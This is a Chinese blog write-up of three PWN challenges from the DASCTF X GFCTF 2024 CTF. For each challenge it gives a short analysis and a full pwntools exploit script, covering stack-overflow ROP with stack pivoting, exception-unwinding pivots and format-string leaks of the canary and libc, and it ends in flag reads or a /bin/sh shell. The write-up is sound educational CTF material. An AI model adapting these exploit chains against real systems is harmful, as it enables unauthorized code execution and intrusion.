DASCTF X GFCTF 2024|四月开启第一局[PWN] wp(详解)

最新推荐文章于 2024-07-25 18:08:40 发布
最新推荐文章于 2024-07-25 18:08:40 发布
阅读量565 收藏 8
点赞数 19
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/susu_xiaosu/article/details/140269141
版权

DASCTF X GFCTF 2024|四月开启第一局🚩[PWN] wp(详解)

1.dynamic_but_static

题目保护情况

64位程序,没有开canary和pie保护,got表可改

64位ida载入

看一下沙箱保护,不能直接execve('/bin/sh')获取shell,也就是需要orw形式读取flag

栈上有溢出,好在都没有过滤这些gadget和地址

🚀思路:1.通过栈溢出泄露出libc地址

     2.为了防止过滤和溢出部分不够的情况,将栈迁移到bss段上执行我们的orw

     3.题目给的libc和远程有点不一样,但是偏移是固定的,找一下就好了(主要是open的地址)

EXP:

from pwn import *
context(log_level='debug',arch='amd64',os='linux')


#io = process('./dynamic_but_static')
io = remote('node5.buuoj.cn',26153)
libc = ELF('./libcc.so.6')

pop_rdi = 0x0000000000401381 #: pop rdi ; ret

ret = 0x000000000040101a 

read_got = 0x404040
puts_plt = 0x4010D0
main_addr = 0x401386

payload = b'a'*0x38 + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr)

io.sendline(payload)
read_addr = u64(io.recv(6).ljust(8,b'\x00'))
success('read_addr----->'+hex(read_addr))
libc_base = read_addr - libc.sym.read -0x3e0
success('libc_base----->'+hex(libc_base))
bss_addr = 0x404060 + 0x240

open_addr = libc_base + 0x1146d0
pop_rax = 0x045eb0 + libc_base#: pop rax ; ret
pop_rsi = 0x2be51 + libc_base #: pop rsi ; ret
pop_rdx = 0x0796a2 + libc_base  # pop_rdx
pop_rbp = 0x4011ed
syscall=libc_base + 0x114059

leave_ret = 0x401482
payload = b'a'*0x38 + p64(pop_rdi)+ p64(0) + p64(pop_rsi) + p64(bss_addr) + p64(pop_rdx) + p64(0x500) + p64(read_addr) 
payload += p64(pop_rbp) + p64(bss_addr) + p64(leave_ret)
io.sendline(payload)
sleep(0.5)

payload = b'./flag\x00\x00' + p64(pop_rdi) + p64(bss_addr) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(open_addr) 
payload += p64(ret)
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(bss_addr+0x200) + p64(pop_rdx) + p64(0x50) + p64(read_addr) + p64(ret)
payload += p64(pop_rdi) + p64(bss_addr+0x200) + p64(puts_plt)


io.sendline(payload)

2.Control

题目保护情况

64位程序canary保护开启,pie没有开

64位ida载入

main函数,程序是静态编译,一开始向gift上面读取内容

接着有一个明显的溢出,随之而来的还有一个try/catch异常处理,当输入的字节数大于96时会抛出异常

那么我们就不要修改read之后的返回地址了,因为程序定位 catch 段是依靠 ret 的地址,如果修改了ret的地址那么就会报错

🚀思路:1.既然不能改返回地址那么就进行栈迁移,如果异常被上一个函数的catch捕获,那么上个函数的rbp就会变成上这个函数的rbp,所以我们控制rbp实现迁移。

     2.通过迁移到bss段上的gift(因为一开始我们可以对gift处地址进行输入),由于ebx被赋值为0了,所以要找一个合适的gadget来帮rdx赋值

              3.找到一个很好的gadget(0x446200)mov     rdx, [rsi-8]经过调试,得到是把rdx的值赋值为0x91

              4.返回0x402221处刚刚好把rsi赋值为gift,而且可以进行读入操作,然后正常系统调用system拿到shell

EXP:

from pwn import *
context(log_level='debug',arch='amd64',os='linux')

io = process('./control')

pop_rdi=0x401c72
pop_rsi=0x405285
pop_rdx=0x401aff
pop_rax=0x462c27

syscall=0x40161e
ret = 0x402237
gift_addr = 0x4D3350
read_addr = 0x402221
mov_rdx = 0x446200

io.recvuntil('Gift>')
io.send(p64(mov_rdx) + p64(read_addr))

io.recvuntil('control?')
payload = b'a'* 0x70 + p64(gift_addr - 0x8) + p64(ret)
#gdb.attach(io)
io.send(payload)

payload = p64(0) + p64(pop_rdi)+p64(gift_addr+0x50) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(pop_rax) + p64(0x3b)
payload += p64(syscall) + b'/bin/sh\x00'
#gdb.attach(io)
io.send(payload)

io.interactive()

3.Exception

题目保护情况 保护全开

64位ida载入

main函数里面有格式化字符串漏洞,也就是,elf基地址,libc基地址,和canary都可以泄露

同样是抛出异常进行处理,不同的是这题给了buf地址,不能修改vuln函数之后的返回地址,但是因为知道buf地址,进而知道main函数的返回地址,修改main函数的返回地址。

🚀思路:1.通过printf格式化字符串漏洞泄露,elf,libc,canary

     2.在main函数返回地址布置rop链,并在vuln函数输入时覆盖到rbp,进行迁移到main函数返回地址执行rop链

EXP:

from pwn import *
context(log_level='debug',arch='amd64',os='linux')

#io = process('./exception')
io = remote('node5.buuoj.cn',25512)
io.recvuntil('your name')
libc = ELF('./exception.so.6')
payload = '%3$paaaa%7$pbbbb%15$p'

#gdb.attach(io)
io.sendline(payload)
io.recvuntil('\n')
read_addr = int(io.recv(14),16) - 18
success('read_addr---->'+hex(read_addr))
libc_base = read_addr - libc.sym['read']
success('libc_base---->'+hex(libc_base))
system = libc.sym['system'] + libc_base
binsh = libc.search('/bin/sh').__next__()+ libc_base
io.recvuntil('aaaa')
canary = int(io.recv(18),16)
success('canary----->'+hex(canary))
io.recvuntil('bbbb')
elf_base = int(io.recv(14),16) - 0x1360
success('elf_base----->'+hex(elf_base))


pause()
pop_rdi = libc_base + 0x0000000000023b6a #: pop rdi ; ret
ret = libc_base + 0x0000000000022679 #: ret
io.recvuntil('stack')
buf_addr = int(io.recv(16),16)
success('buf_addr------>'+hex(buf_addr))
rbp = buf_addr + 0xa0
success('rbp----->'+hex(rbp))
#gdb.attach(io)
pause()
io.recvuntil('exception?')
main_addr = elf_base + 0x1360
payload = b'a'*0x68+p64(canary) + p64(rbp) + p64(elf_base+0x1408) + p64(0) + p64(canary) + p64(0)*3 + p64(ret) 
payload += p64(pop_rdi) + p64(binsh) + p64(system)
#gdb.attach(io)


io.sendline(payload)





io.interactive()

susu_xiaosu
关注
  • 19
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
2024NKCTF-pwn
03-25
2024NKCTF_pwn
DASCTF X GFCTF 2024 Control爆破解法
2303_79701639的博客
04-20 611
最开始写的时候尝试进入二次异常处理,但是会卡住中间的某个函数调用上,尝试在布置rop的时候恢复数据,但是仍然不行,最后选择爆破。在unwind内部会把控制权转移给对应的catch代码,而且这一部分是没有canary的,也就是直接绕开了canary保护。而且栈上面的数据给的很好,在read内部sp+28的部分刚好没有清除,用作了leave的返回地址。,第一次是不能布置完整ROP的,还是必须通过栈劫持的方式去read函数内部进行二次读入。选择爆破bp的返回地址,00覆盖最后一位,让bp转到bss上面。
DASCTF X GFCTF 2024四月开启第一局 —— re前三题wp
Air_cat的博客
04-21 737
DASCTF X GFCTF 2024四月开启第一局 re前三题writeup
DASCTFXGFCTF2024四月Re-ezVM(ida调试dll文件)
一个啥也不会的小菜鸡!
05-25 303
动态调试就会发现原dll文件被改为check1.dll,然后将data解密成正真的dll!发现关键数据:178是判断tar是否为0,176是对tar进行修改。添加输出发现其实就算个简单的多元一次方程,直接上z3就好了!直接叫chatgpt将c转为python,再改改就好了!里面还有一些加减乘除运算,还发现177是多余的!成功解密接下来就是调试解密出来的dll了!所以直接dll动态调试提取数据!直接上chatgpt,问代码!发现是一个超级简单的异或加密!更改一下启动文件就好了!下面是完整的揭秘脚本!
DASCTF X GFCTF 2024四月 EasySignin复现
qq_74825121的博客
04-23 212
观察url是图片链接地址,猜测是ssrf漏洞利用。使用file:///etc/passwd,被过滤。sql读取/flag文件 use test;看wp了解到,使用Gopherus工具打mysql,kali下载好后,cd Gopherus。成功修改登录admin账户才能打开照片。再将base64解码拿到flag。然后需要进行一次url编码再传入。修改密码,抓包修改为admin。
DASCTF X GFCTF 2024四月开启第一局
qq_61670993的博客
04-21 916
简单题
DASCTF X GFCTF 2022十月 Misc
mumuzi的博客
10-24 3795
DASCTF X GFCTF 2022 10月
【Web】DASCTF X GFCTF 2024四月开启第一局 题解(全)
uuzeray的博客
04-20 2393
康好康的图片功能可以打SSRF,不能直接读本地文件,比如/etc/paswd /proc/1/environ。后来题目给了hint让打session反序列化(不是我寻思你附件也妹给session_start啊)大体思路就是先反序列化给record.php写入
【第一天】pwn,获取系统权限,入门题,cyclic-附件资源
03-05
【第一天】pwn,获取系统权限,入门题,cyclic-附件资源
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1069
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1111
大语言模型提示注入攻击安全风险分析报告下载
安全与服务的双重奏:探究ISO20000和ISO27001的企业变革力量
xinbiao001的博客
07-25 941
ISO20000是一个面向机构的IT服务管理标准,旨在提供建立、实施、运作、监控、评审、维护和改进IT服务管理体系(ITSM)的模型。它主要关注的是IT服务管理的流程和质量,帮助企业建立高效的IT服务支持,确保IT服务与企业业务目标一致,提高信息技术服务和运营效率,控制IT风险及相关的成本。例如,华为技术有限公司就通过实施这两项体系,提高了内部IT信息安全管理规范,改善了员工对信息安全服务的认知,提升了品牌形象,并促进了与客户的关系。成功的关键在于管理层对这一过程的承诺,以及员工对标准和流程的认同和遵循。
JAW:一款针对客户端JavaScript的图形化安全分析框架
FreeBuf_的博客
07-25 1709
JAW是一款针对客户端JavaScript的图形化安全分析框架,该工具基于esprima解析器和EsTree SpiderMonkey Spec实现其功能,广大研究人员可以使用该工具分析Web应用程序和基于JavaScript的客户端程序的安全性。7、设计并执行定制的安全相关程序分析,包括预定义 JavaScript 源和接收器之间的数据流分析、控制流和可达性分析、利用 DOM 快照解析 DOM 查询选择器、通过抽象语法树 (AST) 进行模式匹配等;5、支持交互式检测或自动检测不安全的程序行为;
chromedriver-mac-arm64_126.0.6474.0.zip
最新发布
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值